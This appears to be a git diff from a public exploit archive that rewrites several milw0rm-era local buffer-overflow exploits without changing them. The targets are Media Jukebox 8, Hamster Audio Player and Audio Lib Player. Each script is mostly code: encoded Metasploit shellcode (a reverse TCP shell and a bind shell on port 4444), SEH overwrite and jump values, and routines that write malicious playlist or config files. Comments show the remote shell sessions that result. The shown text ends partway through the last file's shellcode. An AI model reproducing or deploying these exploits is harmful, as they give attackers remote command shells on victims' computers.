-"\x4f\x47\x47\x4b\x4f\x51\x45\x51\x38\x50\x31\x49\x50\x46\x30" -"\x46\x30\x46\x30\x50\x50\x51\x50\x46\x30\x47\x30\x50\x50\x4b" -"\x4f\x51\x45\x47\x54\x4d\x59\x48\x47\x43\x58\x49\x50\x49\x38" -"\x45\x50\x43\x32\x42\x48\x43\x32\x43\x30\x42\x31\x51\x4c\x4d" -"\x59\x4b\x51\x43\x5a\x44\x50\x46\x31\x51\x47\x4b\x4f\x51\x45" -"\x51\x30\x42\x4a\x51\x50\x51\x4e\x46\x36\x49\x51\x4a\x46\x44" -"\x46\x46\x36\x49\x51\x4d\x36\x45\x58\x50\x56\x43\x5a\x43\x30" -"\x4b\x4f\x46\x35\x44\x4c\x4b\x39\x48\x43\x43\x5a\x43\x30\x50" -"\x56\x46\x33\x51\x47\x4b\x4f\x51\x45\x42\x38\x4b\x4f\x4e\x33" -"\x41\x41") - -header = ("[playlist]\n"); -header += 
("NumberOfEntries=3\n\n"); -header += ("File1=http://"); # give a dummy header to trick the app -crash = ("\x41" * 262); # overwrite the buffer at 262 bytes -jmp = ("\xeb\x06\x90\x90"); # short jump over SEH handler -seh = ("\x6f\x29\x01\x10"); # universal p/p/r from wnaspi32.dll -nops = ("\x90" * 5); # nop sled for easy landing -junk = ("\xCC" * 500); # gotta make the size seem real ;) - -buff = header + crash + jmp + seh + nops + sc + junk -banner() - -try: - file = open('mr_mes-wicked_miX.pl','w'); - file.write(buff); - file.close(); - print "[+] File created successfully: mr_mes-wicked_miX.pls\n"; -except: - print "[-] Error cant write file to system\n"; - -# milw0rm.com [2009-08-31] +#!/usr/bin/python +# +# ###################################################################### +# +# Media Jukebox 8 (.pls) Universal Local Buffer Exploit (SEH) +# Author: mr_me +# Download: http://download.chip.eu/en/Media-Jukebox-8.0.400_76134.html +# Note: we needed a header to trigger this one ;) +# Tested on: Wind0ws XP and Vist@ +# Greetz: offensive-security, I tried harder :) +# +# ###################################################################### +# +# msf exploit(handler) > exploit +# +# [*] Handler binding to LHOST 0.0.0.0 +# [*] Started reverse handler +# [*] Starting the payload handler... +# [*] Sending stage (474 bytes) +# [*] Command shell session 3 opened (192.168.0.2:4444 -> 192.168.0.4:1246) +# +# Microsoft Windows XP [Version 5.1.2600] +# (C) Copyright 1985-2001 Microsoft Corp. 
+# +# C:\Program Files> +# + +def banner(): + print "\n|-------------------------------------------------------------|" + print "| Media Jukebox 8 (.pls) Universal Local Buffer Exploit (SEH) |" + print "| by MrMe 09/09 |" + print "|-------------------------------------------------------------|\n" + +# windows/shell/reverse_tcp - 617 bytes (stage 1) +# http://www.metasploit.com +# Encoder: x86/alpha_mixed +# LHOST=192.168.0.2, EXITFUNC=seh, LPORT=4444 + +sc = ("\xda\xc8\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49" +"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41" +"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" +"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b" +"\x4c\x4d\x38\x50\x56\x45\x50\x45\x50\x43\x30\x51\x43\x50\x55" +"\x46\x36\x50\x57\x4c\x4b\x42\x4c\x46\x44\x45\x48\x4c\x4b\x47" +"\x35\x47\x4c\x4c\x4b\x50\x54\x44\x45\x42\x58\x45\x51\x4b\x5a" +"\x4c\x4b\x51\x5a\x44\x58\x4c\x4b\x50\x5a\x47\x50\x43\x31\x4a" +"\x4b\x4b\x53\x46\x52\x47\x39\x4c\x4b\x47\x44\x4c\x4b\x43\x31" +"\x4a\x4e\x46\x51\x4b\x4f\x4b\x4c\x50\x31\x49\x50\x4e\x4c\x46" +"\x58\x4d\x30\x42\x54\x44\x47\x49\x51\x48\x4f\x44\x4d\x43\x31" +"\x49\x57\x4a\x4b\x4c\x32\x47\x4b\x43\x4c\x46\x44\x45\x44\x42" +"\x55\x4b\x51\x4c\x4b\x51\x4a\x47\x54\x45\x51\x4a\x4b\x45\x36" +"\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x50\x5a\x45\x4c\x45\x51\x4a" +"\x4b\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x4b\x58\x4a\x4b\x45\x52" +"\x50\x31\x49\x50\x51\x4f\x51\x4e\x51\x4d\x51\x4b\x49\x52\x44" +"\x48\x45\x50\x51\x4e\x43\x5a\x46\x50\x50\x59\x45\x34\x4c\x4b" +"\x45\x49\x4c\x4b\x51\x4b\x44\x4c\x4c\x4b\x51\x4b\x45\x4c\x4c" +"\x4b\x45\x4b\x4c\x4b\x51\x4b\x45\x58\x51\x43\x43\x58\x4c\x4e" +"\x50\x4e\x44\x4e\x4a\x4c\x4b\x4f\x48\x56\x4c\x49\x48\x47\x51" +"\x43\x45\x38\x51\x44\x49\x5a\x4e\x4f\x4c\x51\x4b\x4f\x49\x46" +"\x4b\x31\x4a\x4c\x43\x30\x45\x51\x45\x50\x43\x30\x50\x50\x51" +"\x47\x51\x46\x51\x43\x4b\x39\x4b\x55\x4a\x48\x45\x4f\x43\x30" +"\x45\x50\x43\x30\x4a\x30\x43\x31\x43\x30\x43\x30\x4e\x56\x42" 
+"\x39\x44\x58\x4b\x57\x4e\x44\x44\x59\x42\x50\x4b\x59\x4a\x4c" +"\x4c\x39\x4e\x4a\x45\x30\x4e\x39\x45\x59\x4b\x45\x4e\x4d\x48" +"\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x37\x50\x53\x50\x32\x51\x4f" +"\x46\x53\x46\x52\x43\x30\x51\x4b\x4c\x4d\x50\x4b\x42\x38\x46" +"\x31\x4b\x4f\x49\x47\x4c\x49\x49\x4f\x4c\x49\x49\x53\x4c\x4d" +"\x43\x45\x42\x34\x42\x4a\x45\x55\x50\x59\x50\x51\x46\x33\x4b" +"\x4f\x50\x34\x4c\x4f\x4b\x4f\x51\x45\x43\x34\x51\x49\x4d\x59" +"\x44\x44\x4c\x4e\x4b\x52\x4c\x32\x46\x4b\x51\x37\x46\x34\x4b" +"\x4f\x47\x47\x4b\x4f\x51\x45\x51\x38\x50\x31\x49\x50\x46\x30" +"\x46\x30\x46\x30\x50\x50\x51\x50\x46\x30\x47\x30\x50\x50\x4b" +"\x4f\x51\x45\x47\x54\x4d\x59\x48\x47\x43\x58\x49\x50\x49\x38" +"\x45\x50\x43\x32\x42\x48\x43\x32\x43\x30\x42\x31\x51\x4c\x4d" +"\x59\x4b\x51\x43\x5a\x44\x50\x46\x31\x51\x47\x4b\x4f\x51\x45" +"\x51\x30\x42\x4a\x51\x50\x51\x4e\x46\x36\x49\x51\x4a\x46\x44" +"\x46\x46\x36\x49\x51\x4d\x36\x45\x58\x50\x56\x43\x5a\x43\x30" +"\x4b\x4f\x46\x35\x44\x4c\x4b\x39\x48\x43\x43\x5a\x43\x30\x50" +"\x56\x46\x33\x51\x47\x4b\x4f\x51\x45\x42\x38\x4b\x4f\x4e\x33" +"\x41\x41") + +header = ("[playlist]\n"); +header += ("NumberOfEntries=3\n\n"); +header += ("File1=http://"); # give a dummy header to trick the app +crash = ("\x41" * 262); # overwrite the buffer at 262 bytes +jmp = ("\xeb\x06\x90\x90"); # short jump over SEH handler +seh = ("\x6f\x29\x01\x10"); # universal p/p/r from wnaspi32.dll +nops = ("\x90" * 5); # nop sled for easy landing +junk = ("\xCC" * 500); # gotta make the size seem real ;) + +buff = header + crash + jmp + seh + nops + sc + junk +banner() + +try: + file = open('mr_mes-wicked_miX.pl','w'); + file.write(buff); + file.close(); + print "[+] File created successfully: mr_mes-wicked_miX.pls\n"; +except: + print "[-] Error cant write file to system\n"; + +# milw0rm.com [2009-08-31] diff --git a/platforms/windows/local/9567.pl b/platforms/windows/local/9567.pl index 5d130ba91..9fb5250cd 100755 --- a/platforms/windows/local/9567.pl 
+++ b/platforms/windows/local/9567.pl 
@@ -1,38 +1,38 @@ -#!/usr/bin/perl -# by ThE g0bL!N -# Hamster Audio Player 0.3a (Associations.cfg) Local Buffer Exploit (SEH) -#usage: after clicking on perl file put the cfg file on folder of hamster then open the program after that select option menu and boom Calc !!! -############################################################################ -my $bof="\x41" x 4108; -my $nsh="\xEB\x06\x90\x90"; -my $seh="\xB8\x15\xC6\x72"; -my $sec= -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". -"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". -"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". -"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". -"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". -"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". -"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". -"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". -"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". -"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". -"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". -"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". -"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". -"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". -"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". -"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". -"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". 
-"\x4e\x56\x43\x46\x42\x30\x5a"; -print $bof.$nsh.$seh.$nop.$sec; -################################################################### -open(myfile,'>> Associations.cfg'); -print myfile $bof.$nsh.$seh.$nop.$sec; -################################################################### - -# milw0rm.com [2009-09-01] +#!/usr/bin/perl +# by ThE g0bL!N +# Hamster Audio Player 0.3a (Associations.cfg) Local Buffer Exploit (SEH) +#usage: after clicking on perl file put the cfg file on folder of hamster then open the program after that select option menu and boom Calc !!! +############################################################################ +my $bof="\x41" x 4108; +my $nsh="\xEB\x06\x90\x90"; +my $seh="\xB8\x15\xC6\x72"; +my $sec= +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". +"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". +"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". +"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". +"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". +"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". +"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". +"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". +"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". +"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". +"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". +"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". +"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". 
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". +"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". +"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". +"\x4e\x56\x43\x46\x42\x30\x5a"; +print $bof.$nsh.$seh.$nop.$sec; +################################################################### +open(myfile,'>> Associations.cfg'); +print myfile $bof.$nsh.$seh.$nop.$sec; +################################################################### + +# milw0rm.com [2009-09-01] diff --git a/platforms/windows/local/9580.pl b/platforms/windows/local/9580.pl index 0cf814f5a..e1c097562 100755 --- a/platforms/windows/local/9580.pl +++ b/platforms/windows/local/9580.pl 
@@ -1,41 +1,41 @@ -#!/usr/bin/perl -# by hack4love -# hack4love@hotmail.com -# Hamster Audio Player 0.3a (Associations.cfg) Local Buffer Exploit //sp2(SEH) -# Original exploit::http://www.milw0rm.com/exploits/9567 -# put the cfg file on folder of hamster then open -# the program after that select option menu and boom Calc !!! -############################################################################ -my $bof="\x41" x 4108; -my $nsh="\xEB\x06\x90\x90"; -my $seh="\xbe\x2e\xd1\x72";##test under sp2 -my $sec= -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". -"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". -"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". -"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". -"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". -"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". -"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". -"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". -"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". -"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". -"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". -"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". -"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". -"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". -"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". -"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". -"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". 
-"\x4e\x56\x43\x46\x42\x30\x5a"; -print $bof.$nsh.$seh.$nop.$sec; -################################################################### -open(myfile,'>> Associations.cfg'); -print myfile $bof.$nsh.$seh.$nop.$sec; -################################################################### - -# milw0rm.com [2009-09-03] +#!/usr/bin/perl +# by hack4love +# hack4love@hotmail.com +# Hamster Audio Player 0.3a (Associations.cfg) Local Buffer Exploit //sp2(SEH) +# Original exploit::http://www.milw0rm.com/exploits/9567 +# put the cfg file on folder of hamster then open +# the program after that select option menu and boom Calc !!! +############################################################################ +my $bof="\x41" x 4108; +my $nsh="\xEB\x06\x90\x90"; +my $seh="\xbe\x2e\xd1\x72";##test under sp2 +my $sec= +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". +"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". +"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". +"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". +"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". +"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". +"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". +"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". +"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". +"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". +"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". +"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". 
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". +"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". +"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". +"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". +"\x4e\x56\x43\x46\x42\x30\x5a"; +print $bof.$nsh.$seh.$nop.$sec; +################################################################### +open(myfile,'>> Associations.cfg'); +print myfile $bof.$nsh.$seh.$nop.$sec; +################################################################### + +# milw0rm.com [2009-09-03] diff --git a/platforms/windows/local/9610.py b/platforms/windows/local/9610.py index 0b1bac227..ebf55926f 100755 --- a/platforms/windows/local/9610.py +++ b/platforms/windows/local/9610.py 
@@ -1,91 +1,91 @@ -# Audio Lib Player m3u SEH overwrite -# product: http://www.toocharger.com/telecharger/logiciels/audio-lib-player/19056.htm -# Usage: Create playlist, load exploit.m3u and connect to shell on port 4444 -# -# $ nc 192.168.1.131 4444 -# Microsoft Windows XP [Version 5.1.2600] -# (C) Copyright 1985-2001 Microsoft Corp. -# -# C:\Documents and Settings\blake\Desktop\ALP> - -import sys - -print "\n[*] Audio Lib Player m3u SEH Overwrite" -print "[*] Written by Blake" -print "[*] Tested on Windows XP SP3\n" - - -# windows/shell_bind_tcp - 695 bytes -# http://www.metasploit.com -# Encoder: x86/alpha_mixed -# EXITFUNC=seh, LPORT=4444, RHOST= - -shellcode = ( -"\xdd\xc1\xd9\x74\x24\xf4\x5f\x57\x59\x49\x49\x49\x49\x49\x49" -"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41" -"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" -"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b" -"\x4c\x42\x4a\x4a\x4b\x50\x4d\x4a\x48\x4b\x49\x4b\x4f\x4b\x4f" -"\x4b\x4f\x45\x30\x4c\x4b\x42\x4c\x51\x34\x47\x54\x4c\x4b\x47" -"\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48\x45\x51\x4a\x4f" -"\x4c\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a" -"\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x45\x51\x4a\x4e\x46\x51" -"\x49\x50\x4a\x39\x4e\x4c\x4c\x44\x49\x50\x44\x34\x45\x57\x49" -"\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4b\x44\x47\x4b" -"\x46\x34\x47\x54\x47\x58\x43\x45\x4d\x35\x4c\x4b\x51\x4f\x46" -"\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b" -"\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x44\x43\x46\x4c\x4c\x4b\x4b" -"\x39\x42\x4c\x51\x34\x45\x4c\x43\x51\x49\x53\x50\x31\x49\x4b" -"\x45\x34\x4c\x4b\x51\x53\x46\x50\x4c\x4b\x51\x50\x44\x4c\x4c" -"\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x51\x50\x43\x38\x51\x4e" -"\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f\x48" -"\x56\x42\x46\x50\x53\x43\x56\x43\x58\x50\x33\x50\x32\x43\x58" -"\x43\x47\x43\x43\x47\x42\x51\x4f\x51\x44\x4b\x4f\x48\x50\x45" 
-"\x38\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x4e\x36" -"\x51\x4f\x4b\x39\x4d\x35\x45\x36\x4d\x51\x4a\x4d\x43\x38\x44" -"\x42\x50\x55\x43\x5a\x44\x42\x4b\x4f\x4e\x30\x43\x58\x49\x49" -"\x43\x39\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48\x56\x51\x43\x46" -"\x33\x46\x33\x46\x33\x50\x53\x50\x43\x51\x43\x51\x53\x50\x53" -"\x4b\x4f\x48\x50\x42\x46\x42\x48\x42\x31\x51\x4c\x43\x56\x46" -"\x33\x4c\x49\x4b\x51\x4d\x45\x45\x38\x4e\x44\x44\x5a\x42\x50" -"\x48\x47\x51\x47\x4b\x4f\x49\x46\x43\x5a\x44\x50\x46\x31\x46" -"\x35\x4b\x4f\x4e\x30\x42\x48\x4e\x44\x4e\x4d\x46\x4e\x4d\x39" -"\x50\x57\x4b\x4f\x49\x46\x51\x43\x51\x45\x4b\x4f\x4e\x30\x45" -"\x38\x4b\x55\x51\x59\x4b\x36\x51\x59\x50\x57\x4b\x4f\x49\x46" -"\x46\x30\x46\x34\x50\x54\x51\x45\x4b\x4f\x48\x50\x4d\x43\x45" -"\x38\x4a\x47\x43\x49\x48\x46\x44\x39\x50\x57\x4b\x4f\x48\x56" -"\x50\x55\x4b\x4f\x48\x50\x43\x56\x42\x4a\x45\x34\x43\x56\x43" -"\x58\x43\x53\x42\x4d\x4c\x49\x4a\x45\x43\x5a\x50\x50\x46\x39" -"\x46\x49\x48\x4c\x4b\x39\x4d\x37\x43\x5a\x50\x44\x4c\x49\x4b" -"\x52\x46\x51\x49\x50\x4b\x43\x4e\x4a\x4b\x4e\x47\x32\x46\x4d" -"\x4b\x4e\x51\x52\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x50\x38\x4e" -"\x4b\x4e\x4b\x4e\x4b\x43\x58\x44\x32\x4b\x4e\x4e\x53\x45\x46" -"\x4b\x4f\x43\x45\x47\x34\x4b\x4f\x4e\x36\x51\x4b\x46\x37\x51" -"\x42\x50\x51\x50\x51\x50\x51\x43\x5a\x43\x31\x50\x51\x46\x31" -"\x51\x45\x50\x51\x4b\x4f\x48\x50\x45\x38\x4e\x4d\x48\x59\x43" -"\x35\x48\x4e\x46\x33\x4b\x4f\x4e\x36\x42\x4a\x4b\x4f\x4b\x4f" -"\x46\x57\x4b\x4f\x48\x50\x4c\x4b\x46\x37\x4b\x4c\x4b\x33\x49" -"\x54\x45\x34\x4b\x4f\x48\x56\x46\x32\x4b\x4f\x4e\x30\x45\x38" -"\x4c\x30\x4d\x5a\x44\x44\x51\x4f\x50\x53\x4b\x4f\x49\x46\x4b" -"\x4f\x48\x50\x41\x41") - -payload = "\x41" * 420 # seh overwritten at 1224 -nops = "\x90" * 100 # Nop Sled -sc = shellcode # bind shell 695 bytes -near_jmp = "\xe9\x10\xfd\xff\xff" # near jump back -752 bytes -seh = "\x6a\x19\x9a\x0f" # 0x0f9a196a pop ebp; pop ebx; ret from [C:\WINDOWS\system32\VBAJET32.dll] -next_seh = 
"\xeb\xf9\xff\xff" # short jump back -7 -junk = "\x43" * 572 # junk buffer - - -print "[+] Creating malicious playlist" -try: - file = open("exploit.m3u",'w') - file.write(payload + nops + sc + near_jmp + next_seh + seh + junk) - file.close() - print "[+] File created successfully" -except: - print "[x] Could not create file" - sys.exit(0) - -# milw0rm.com [2009-09-09] +# Audio Lib Player m3u SEH overwrite +# product: http://www.toocharger.com/telecharger/logiciels/audio-lib-player/19056.htm +# Usage: Create playlist, load exploit.m3u and connect to shell on port 4444 +# +# $ nc 192.168.1.131 4444 +# Microsoft Windows XP [Version 5.1.2600] +# (C) Copyright 1985-2001 Microsoft Corp. +# +# C:\Documents and Settings\blake\Desktop\ALP> + +import sys + +print "\n[*] Audio Lib Player m3u SEH Overwrite" +print "[*] Written by Blake" +print "[*] Tested on Windows XP SP3\n" + + +# windows/shell_bind_tcp - 695 bytes +# http://www.metasploit.com +# Encoder: x86/alpha_mixed +# EXITFUNC=seh, LPORT=4444, RHOST= + +shellcode = ( +"\xdd\xc1\xd9\x74\x24\xf4\x5f\x57\x59\x49\x49\x49\x49\x49\x49" +"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41" +"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" +"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b" +"\x4c\x42\x4a\x4a\x4b\x50\x4d\x4a\x48\x4b\x49\x4b\x4f\x4b\x4f" +"\x4b\x4f\x45\x30\x4c\x4b\x42\x4c\x51\x34\x47\x54\x4c\x4b\x47" +"\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48\x45\x51\x4a\x4f" +"\x4c\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a" +"\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x45\x51\x4a\x4e\x46\x51" +"\x49\x50\x4a\x39\x4e\x4c\x4c\x44\x49\x50\x44\x34\x45\x57\x49" +"\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4b\x44\x47\x4b" +"\x46\x34\x47\x54\x47\x58\x43\x45\x4d\x35\x4c\x4b\x51\x4f\x46" +"\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b" +"\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x44\x43\x46\x4c\x4c\x4b\x4b" +"\x39\x42\x4c\x51\x34\x45\x4c\x43\x51\x49\x53\x50\x31\x49\x4b" 
